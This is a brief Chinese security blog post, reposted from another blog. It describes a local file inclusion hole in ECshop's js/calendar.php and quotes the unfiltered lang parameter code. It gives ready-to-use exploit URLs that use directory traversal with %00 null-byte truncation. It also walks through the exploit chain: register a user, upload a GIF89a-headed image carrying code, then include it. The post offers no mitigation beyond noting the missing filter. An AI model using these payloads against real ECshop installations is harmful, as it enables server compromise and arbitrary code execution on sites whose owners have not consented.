ECshop本地包含漏洞 |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

js/calendar.php $lang = (!empty($_GET[‘lang’])) ? trim($_GET[‘lang’]) : ‘zh_cn’;//没有过滤,很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x-javascript; charset=’ . EC_CHARSET); include_once(‘../languages/’ . $lang . ‘/calendar.php’);//这里包含,需要截断 测试代码 : // 需要 magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00.(注意后面有个.) 利用方法: 先注册用户 然后上传GIF89a头的GIF文件欺骗, 然后包含 代码:http://localhost/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.

转自: Lynn’s blog

Tags:

ECshop漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
ECshop本地包含漏洞 |